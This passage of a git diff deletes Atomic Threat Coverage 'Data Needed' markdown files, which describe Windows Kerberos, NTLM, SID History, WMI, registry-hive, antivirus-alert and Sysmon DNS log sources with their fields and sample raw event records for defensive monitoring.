deleted file mode 100644
index 0dbc367..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0074_4765_sid_history_was_added_to_an_account.md
+++ /dev/null
@@ -1,40 +0,0 @@
-| Title              | DN0074_4765_sid_history_was_added_to_an_account       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | SID History was added to an account |
-| **Logging Policy** | <ul><li>[LP0026_windows_audit_user_account_management](../Logging_Policies/LP0026_windows_audit_user_account_management.md)</li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4765](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4765)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>Subject</li><li>SecurityID</li><li>AccountName</li><li>AccountDomain</li><li>LogonID</li><li>TargetAccount</li><li>SecurityID</li><li>AccountName</li><li>AccountDomain</li><li>SourceAccount</li><li>SecurityID</li><li>AccountName</li><li>AdditionalInformation</li><li>Privileges</li><li>SIDList</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-SID History was added to an account.
-Subject:
-Security ID:%6
-Account Name:%7
-Account Domain:%8
-Logon ID:%9
-Target Account:
-Security ID:%5
-Account Name:%3
-Account Domain:%4
-Source Account:
-Security ID:%2
-Account Name:%1
-Additional Information:
-Privileges:%10
-SID List:%11
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0075_4766_attempt_to_add_sid_history_to_an_account_failed.md b/Atomic_Threat_Coverage/Data_Needed/DN0075_4766_attempt_to_add_sid_history_to_an_account_failed.md
deleted file mode 100644
index 823691c..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0075_4766_attempt_to_add_sid_history_to_an_account_failed.md
+++ /dev/null
@@ -1,38 +0,0 @@
-| Title              | DN0075_4766_attempt_to_add_sid_history_to_an_account_failed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | An attempt to add SID History to an account failed |
-| **Logging Policy** | <ul><li>[LP0026_windows_audit_user_account_management](../Logging_Policies/LP0026_windows_audit_user_account_management.md)</li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4766](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4766)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>Subject</li><li>SecurityID</li><li>AccountName</li><li>AccountDomain</li><li>LogonID</li><li>TargetAccount</li><li>SecurityID</li><li>AccountName</li><li>AccountDomain</li><li>SourceAccount</li><li>AccountName</li><li>AdditionalInformation</li><li>Privileges</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-An attempt to add SID History to an account failed.
-Subject:
-Security ID:-
-Account Name:%5
-Account Domain:%6
-Logon ID:%7
-Target Account:
-Security ID:%4
-Account Name:%2
-Account Domain:%3
-Source Account:
-Account Name:%1
-Additional Information:
-Privileges:%8
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0076_4768_kerberos_authentication_ticket_was_requested.md b/Atomic_Threat_Coverage/Data_Needed/DN0076_4768_kerberos_authentication_ticket_was_requested.md
deleted file mode 100644
index e349de2..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0076_4768_kerberos_authentication_ticket_was_requested.md
+++ /dev/null
@@ -1,58 +0,0 @@
-| Title              | DN0076_4768_kerberos_authentication_ticket_was_requested       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time Key Distribution Center issues a  Kerberos Ticket Granting Ticket (TGT). This event generates only  on domain controllers. If TGT issue fails then you will see  Failure event with Result Code field not equal to "0x0" |
-| **Logging Policy** | <ul><li>[LP0038_windows_audit_kerberos_authentication_service](../Logging_Policies/LP0038_windows_audit_kerberos_authentication_service.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4768.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4768.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>ServiceName</li><li>ServiceSid</li><li>TicketOptions</li><li>Status</li><li>TicketEncryptionType</li><li>PreAuthType</li><li>IpAddress</li><li>IpPort</li><li>CertIssuerName</li><li>CertSerialNumber</li><li>CertThumbprint</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4768</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>14339</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-07T18:13:46.074535600Z" /> 
-    <EventRecordID>166747</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="520" ThreadID="1496" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="TargetUserName">dadmin</Data> 
-    <Data Name="TargetDomainName">CONTOSO.LOCAL</Data> 
-    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="ServiceName">krbtgt</Data> 
-    <Data Name="ServiceSid">S-1-5-21-3457937927-2839227994-823803824-502</Data> 
-    <Data Name="TicketOptions">0x40810010</Data> 
-    <Data Name="Status">0x0</Data> 
-    <Data Name="TicketEncryptionType">0x12</Data> 
-    <Data Name="PreAuthType">15</Data> 
-    <Data Name="IpAddress">::ffff:10.0.0.12</Data> 
-    <Data Name="IpPort">49273</Data> 
-    <Data Name="CertIssuerName">contoso-DC01-CA-1</Data> 
-    <Data Name="CertSerialNumber">1D0000000D292FBE3C6CDDAFA200020000000D</Data> 
-    <Data Name="CertThumbprint">564DFAEE99C71D62ABC553E695BD8DBC46669413</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0077_4769_kerberos_service_ticket_was_requested.md b/Atomic_Threat_Coverage/Data_Needed/DN0077_4769_kerberos_service_ticket_was_requested.md
deleted file mode 100644
index cac4aaa..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0077_4769_kerberos_service_ticket_was_requested.md
+++ /dev/null
@@ -1,55 +0,0 @@
-| Title              | DN0077_4769_kerberos_service_ticket_was_requested       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time Key Distribution Center gets a Kerberos Ticket Granting  Service (TGS) ticket request. This event generates only on domain controllers. If TGS  issue fails then you will see Failure event with Failure Code field not equal to "0x0" |
-| **Logging Policy** | <ul><li>[LP0106_windows_audit_kerberos_service_ticket_operations](../Logging_Policies/LP0106_windows_audit_kerberos_service_ticket_operations.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4769.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4769.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>TargetUserName</li><li>TargetDomainName</li><li>ServiceName</li><li>ServiceSid</li><li>TicketOptions</li><li>TicketEncryptionType</li><li>IpAddress</li><li>IpPort</li><li>Status</li><li>LogonGuid</li><li>TransmittedServices</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
-    <EventID>4769</EventID>
-    <Version>0</Version>
-    <Level>0</Level>
-    <Task>14337</Task>
-    <Opcode>0</Opcode>
-    <Keywords>0x8020000000000000</Keywords>
-    <TimeCreated SystemTime="2015-08-07T18:13:46.043256100Z" />
-    <EventRecordID>166746</EventRecordID>
-    <Correlation />
-    <Execution ProcessID="520" ThreadID="1496" />
-    <Channel>Security</Channel>
-    <Computer>DC01.contoso.local</Computer>
-  <Security />
-  </System>
-  - <EventData>
-    <Data Name="TargetUserName">dadmin@CONTOSO.LOCAL</Data>
-    <Data Name="TargetDomainName">CONTOSO.LOCAL</Data>
-    <Data Name="ServiceName">WIN2008R2$</Data>
-    <Data Name="ServiceSid">S-1-5-21-3457937927-2839227994-823803824-2102</Data>
-    <Data Name="TicketOptions">0x40810000</Data>
-    <Data Name="TicketEncryptionType">0x12</Data>
-    <Data Name="IpAddress">::ffff:10.0.0.12</Data>
-    <Data Name="IpPort">49272</Data>
-    <Data Name="Status">0x0</Data>
-    <Data Name="LogonGuid">{F85C455E-C66E-205C-6B39-F6C60A7FE453}</Data>
-    <Data Name="TransmittedServices">-</Data>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0078_4771_kerberos_pre_authentication_failed.md b/Atomic_Threat_Coverage/Data_Needed/DN0078_4771_kerberos_pre_authentication_failed.md
deleted file mode 100644
index 425019a..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0078_4771_kerberos_pre_authentication_failed.md
+++ /dev/null
@@ -1,55 +0,0 @@
-| Title              | DN0078_4771_kerberos_pre_authentication_failed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time the Key Distribution Center fails  to issue a Kerberos Ticket Granting Ticket (TGT). This can occur  when a domain controller doesn’t have a certificate installed for  smart card authentication (for example, with a "Domain Controller"  or "Domain Controller Authentication" template), the user’s password  has expired, or the wrong password was provided. This event  generates only on domain controllers |
-| **Logging Policy** | <ul><li>[LP0038_windows_audit_kerberos_authentication_service](../Logging_Policies/LP0038_windows_audit_kerberos_authentication_service.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4771.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4771.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>TargetUserName</li><li>TargetSid</li><li>ServiceName</li><li>TicketOptions</li><li>Status</li><li>PreAuthType</li><li>IpAddress</li><li>IpPort</li><li>CertIssuerName</li><li>CertSerialNumber</li><li>CertThumbprint</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4771</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>14339</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8010000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-08-07T18:10:21.495462300Z" /> 
-    <EventRecordID>166708</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="520" ThreadID="1084" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="TargetUserName">dadmin</Data> 
-    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="ServiceName">krbtgt/CONTOSO.LOCAL</Data> 
-    <Data Name="TicketOptions">0x40810010</Data> 
-    <Data Name="Status">0x10</Data> 
-    <Data Name="PreAuthType">15</Data> 
-    <Data Name="IpAddress">::ffff:10.0.0.12</Data> 
-    <Data Name="IpPort">49254</Data> 
-    <Data Name="CertIssuerName" /> 
-    <Data Name="CertSerialNumber" /> 
-    <Data Name="CertThumbprint" /> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0079_4776_computer_attempted_to_validate_the_credentials_for_an_account.md b/Atomic_Threat_Coverage/Data_Needed/DN0079_4776_computer_attempted_to_validate_the_credentials_for_an_account.md
deleted file mode 100644
index 7c1c1a1..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0079_4776_computer_attempted_to_validate_the_credentials_for_an_account.md
+++ /dev/null
@@ -1,48 +0,0 @@
-| Title              | DN0079_4776_computer_attempted_to_validate_the_credentials_for_an_account       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates every time that a credential validation occurs  using NTLM authentication. This event occurs only on the computer  that is authoritative for the provided credentials. For domain  accounts, the domain controller is authoritative. For local accounts,  the local computer is authoritative |
-| **Logging Policy** | <ul><li>[LP0107_windows_audit_credential_validation](../Logging_Policies/LP0107_windows_audit_credential_validation.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4776.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4776.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>PackageName</li><li>TargetUserName</li><li>Workstation</li><li>Status</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4776</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>14336</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8010000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-07-25T04:38:11.003163100Z" /> 
-    <EventRecordID>165437</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="500" ThreadID="532" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="PackageName">MICROSOFT\_AUTHENTICATION\_PACKAGE\_V1\_0</Data> 
-    <Data Name="TargetUserName">dadmin</Data> 
-    <Data Name="Workstation">WIN81</Data> 
-    <Data Name="Status">0xc0000234</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0080_5859_wmi_activity.md b/Atomic_Threat_Coverage/Data_Needed/DN0080_5859_wmi_activity.md
deleted file mode 100644
index 48f578b..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0080_5859_wmi_activity.md
+++ /dev/null
@@ -1,53 +0,0 @@
-| Title              | DN0080_5859_wmi_activity       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | WMI Event which provide ability to catch Timer-based WMI Events and provide  usefult information for identification of suspicious WMI activity |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.darkoperator.com/blog/2017/10/14/basics-of-tracking-wmi-activity](https://www.darkoperator.com/blog/2017/10/14/basics-of-tracking-wmi-activity)</li><li>[https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/](https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-WMI-Activity/Operational     |
-| **Provider**       | Microsoft-Windows-WMI-Activity    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>NamespaceName</li><li>Query</li><li>ProcessID</li><li>Provider</li><li>queryid</li><li>PossibleCause</li><li>CorrelationActivityID</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-WMI-Activity" Guid="{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}" /> 
-      <EventID>5859</EventID> 
-      <Version>0</Version> 
-      <Level>0</Level> 
-      <Task>0</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x4000000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-02-08T09:37:37.108925700Z" /> 
-      <EventRecordID>57003</EventRecordID> 
-      <Correlation ActivityID="{10490123-32E3-0000-B1F0-46D991BFD401}" /> 
-      <Execution ProcessID="436" ThreadID="3076" /> 
-      <Channel>Microsoft-Windows-WMI-Activity/Operational</Channel> 
-      <Computer>atc-win-10.atc.local</Computer> 
-      <Security UserID="S-1-5-18" /> 
-    </System>
-  - <UserData>
-    - <Operation_EssStarted xmlns="http://manifests.microsoft.com/win/2006/windows/WMI">
-        <NamespaceName>//./root/cimv2</NamespaceName> 
-        <Query>select * from MSFT_SCMEventLogEvent</Query> 
-        <User>S-1-5-32-544</User> 
-        <Processid>436</Processid> 
-        <Provider>SCM Event Provider</Provider> 
-        <queryid>0</queryid> 
-        <PossibleCause>Permanent</PossibleCause> 
-      </Operation_EssStarted>
-    </UserData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0081_5861_wmi_activity.md b/Atomic_Threat_Coverage/Data_Needed/DN0081_5861_wmi_activity.md
deleted file mode 100644
index b1ab071..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0081_5861_wmi_activity.md
+++ /dev/null
@@ -1,50 +0,0 @@
-| Title              | DN0081_5861_wmi_activity       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | WMI Event which provide ability to catch Timer-based WMI Events and provide  usefult information for identification of suspicious WMI activity |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.darkoperator.com/blog/2017/10/14/basics-of-tracking-wmi-activity](https://www.darkoperator.com/blog/2017/10/14/basics-of-tracking-wmi-activity)</li><li>[https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/](https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-WMI-Activity/Operational     |
-| **Provider**       | Microsoft-Windows-WMI-Activity    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>Namespace</li><li>ESS</li><li>Consumer</li><li>PossibleCause</li><li>CreatorSID</li><li>EventNamespace</li><li>Query</li><li>QueryLanguage</li><li>EventFilter</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-WMI-Activity" Guid="{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}" /> 
-    <EventID>5861</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>0</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x4000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-02-06T20:23:40.952921100Z" /> 
-    <EventRecordID>56793</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="1416" ThreadID="2244" /> 
-    <Channel>Microsoft-Windows-WMI-Activity/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <UserData>
-    - <Operation_ESStoConsumerBinding xmlns="http://manifests.microsoft.com/win/2006/windows/WMI">
-      <Namespace>//./ROOT/Subscription</Namespace> 
-      <ESS>SCM Event Log Filter</ESS> 
-      <CONSUMER>NTEventLogEventConsumer="SCM Event Log Consumer"</CONSUMER> 
-      <PossibleCause>Binding EventFilter: instance of __EventFilter { CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; EventNamespace = "root\\cimv2"; Name = "SCM Event Log Filter"; Query = "select * from MSFT_SCMEventLogEvent"; QueryLanguage = "WQL"; }; Perm. Consumer: instance of NTEventLogEventConsumer { Category = 0; CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; EventType = 1; Name = "SCM Event Log Consumer"; NameOfUserSIDProperty = "sid"; SourceName = "Service Control Manager"; };</PossibleCause> 
-    </Operation_ESStoConsumerBinding>
-  </UserData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0082_8002_ntlm_server_blocked_audit.md b/Atomic_Threat_Coverage/Data_Needed/DN0082_8002_ntlm_server_blocked_audit.md
deleted file mode 100644
index 12f0f1e..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0082_8002_ntlm_server_blocked_audit.md
+++ /dev/null
@@ -1,49 +0,0 @@
-| Title              | DN0082_8002_ntlm_server_blocked_audit       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | NTLM server blocked audit: Audit Incoming NTLM Traffic that would be blocked. Actually it's just event about NTLM authentication, it doesn't necessary supposed to be blocked. Blocked NTLM auth is the same provider but Event ID 4002 |
-| **Logging Policy** | <ul><li>[LP0044_windows_ntlm_audit](../Logging_Policies/LP0044_windows_ntlm_audit.md)</li></ul> |
-| **References**     | <ul><li>[https://twitter.com/JohnLaTwC/status/1004895902010507266](https://twitter.com/JohnLaTwC/status/1004895902010507266)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-NTLM/Operational     |
-| **Provider**       | Microsoft-Windows-NTLM    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li><li>CallerPID</li><li>ProcessName</li><li>ClientLUID</li><li>ClientUserName</li><li>ClientDomainName</li><li>MechanismOID</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-NTLM" Guid="{AC43300D-5FCC-4800-8E99-1BD3F85F0320}" /> 
-      <EventID>8002</EventID> 
-      <Version>0</Version> 
-      <Level>4</Level> 
-      <Task>2</Task> 
-      <Opcode>0</Opcode> 
-      <Keywords>0x8000000000000000</Keywords> 
-      <TimeCreated SystemTime="2019-03-02T23:00:00.746139000Z" /> 
-      <EventRecordID>12</EventRecordID> 
-      <Correlation /> 
-      <Execution ProcessID="468" ThreadID="2660" /> 
-      <Channel>Microsoft-Windows-NTLM/Operational</Channel> 
-      <Computer>dc.yugoslavskiy.local</Computer> 
-      <Security UserID="S-1-5-18" /> 
-    </System>
-  - <EventData>
-      <Data Name="CallerPID">4</Data> 
-      <Data Name="ProcessName" /> 
-      <Data Name="ClientLUID">0x3e7</Data> 
-      <Data Name="ClientUserName">DC$</Data> 
-      <Data Name="ClientDomainName">atc</Data> 
-    <Data Name="MechanismOID">1.3.6.1.4.1.311.2.2.10</Data> 
-    </EventData>
-  </Event>
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0083_16_access_history_in_hive_was_cleared.md b/Atomic_Threat_Coverage/Data_Needed/DN0083_16_access_history_in_hive_was_cleared.md
deleted file mode 100644
index d34701e..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0083_16_access_history_in_hive_was_cleared.md
+++ /dev/null
@@ -1,48 +0,0 @@
-| Title              | DN0083_16_access_history_in_hive_was_cleared       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The access history in hive was cleared updating X keys and creating Y modified pages |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[http://www.eventid.net/display-eventid-16-source-Microsoft-Windows-Kernel-General-eventno-11563-phase-1.htm](http://www.eventid.net/display-eventid-16-source-Microsoft-Windows-Kernel-General-eventno-11563-phase-1.htm)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | Microsoft-Windows-Kernel-General    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li><li>HiveNameLength</li><li>HiveName</li><li>KeysUpdated</li><li>DirtyPages</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-      <Provider Name="Microsoft-Windows-Kernel-General" Guid="{A68CA8B7-004F-D7B6-A698-07E2DE0F1F5D}" />
-      <EventID>16</EventID>
-      <Version>0</Version>
-      <Level>4</Level>
-      <Task>0</Task>
-      <Opcode>0</Opcode>
-      <Keywords>0x8000000000000000</Keywords>
-      <TimeCreated SystemTime="2018-01-12T03:18:59.347973200Z" />
-      <EventRecordID>1705</EventRecordID>
-      <Correlation />
-      <Execution ProcessID="4" ThreadID="540" />
-      <Channel>System</Channel>
-      <Computer>atc-win-10.atc.local</Computer>
-      <Security UserID="S-1-5-18" />
-    </System>
-  - <EventData>
-      <Data Name="HiveNameLength">31</Data>
-      <Data Name="HiveName">\SystemRoot\System32\Config\SAM</Data>
-      <Data Name="KeysUpdated">65</Data>
-      <Data Name="DirtyPages">7</Data>
-    </EventData>
-  </Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0084_av_alert.md b/Atomic_Threat_Coverage/Data_Needed/DN0084_av_alert.md
deleted file mode 100644
index d0f7397..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0084_av_alert.md
+++ /dev/null
@@ -1,59 +0,0 @@
-| Title              | DN0084_av_alert       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Anti-virus alert |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[None](None)</li></ul> |
-| **Platform**       | antivirus    |
-| **Type**           | None        |
-| **Channel**        | None     |
-| **Provider**       | None    |
-| **Fields**         | <ul><li>Hostname</li><li>Signature</li><li>AlertTitle</li><li>Category</li><li>Severity</li><li>Sha1</li><li>FileName</li><li>FilePath</li><li>IpAddress</li><li>UserName</li><li>UserDomain</li><li>FileHash</li><li>Hashes</li><li>Imphash</li><li>Sha256hash</li><li>Sha1hash</li><li>Md5hash</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-{
-  "AlertTime":"2017-01-23T07:32:54.1861171Z",
-  "ComputerDnsName":"desktop-bvccckk",
-  "AlertTitle":"Suspicious PowerShell commandline",
-  "Category":"SuspiciousActivity",
-  "Severity":"Medium",
-  "AlertId":"636207535742330111_-1114309685",
-  "Actor":null,
-  "LinkToWDATP":"https://securitycenter.windows.com/alert/636207535742330111_-1114309685",
-  "IocName":null,
-  "IocValue":null,
-  "CreatorIocName":null,
-  "CreatorIocValue":null,
-  "Sha1":"69484ca722b4285a234896a2e31707cbedc59ef9",
-  "FileName":"powershell.exe",
-  "FilePath":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0",
-  "IpAddress":null,
-  "Url":null,
-  "IoaDefinitiondId":"7f1c3609-a3ff-40e2-995b-c01770161d68",
-  "UserName":null,
-  "AlertPart":0,
-  "FullId":"636207535742330111_-1114309685:9DE735BA9FF87725E392C6DFBEB2AF279035CDE229FCC00D28C0F3242C5A50AF",
-  "LastProcessedTimeUtc":"2017-01-23T11:33:45.0760449Z",
-  "ThreatCategory":null,
-  "ThreatFamily":null,
-  "ThreatName":null,
-  "RemediationAction":null,
-  "RemediationIsSuccess":null,
-  "Source":"Windows Defender ATP",
-  "Md5":null,
-  "Sha256":null,
-  "WasExecutingWhileDetected":null,
-  "FileHash":"69484ca722b4285a234896a2e31707cbedc59ef9",
-  "IocUniqueId":"9DE735BA9FF87725E392C6DFBEB2AF279035CDE229FCC00D28C0F3242C5A50AF"
-}
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0085_22_windows_sysmon_DnsQuery.md b/Atomic_Threat_Coverage/Data_Needed/DN0085_22_windows_sysmon_DnsQuery.md
deleted file mode 100644
index 8e6b102..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0085_22_windows_sysmon_DnsQuery.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0085_22_windows_sysmon_DnsQuery       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | This event generates when a process executes a DNS query, whether the result is  successful or fails, cached or not |
-| **Logging Policy** | <ul><li>[LP0011_windows_sysmon_DnsQuery](../Logging_Policies/LP0011_windows_sysmon_DnsQuery.md)</li></ul> |
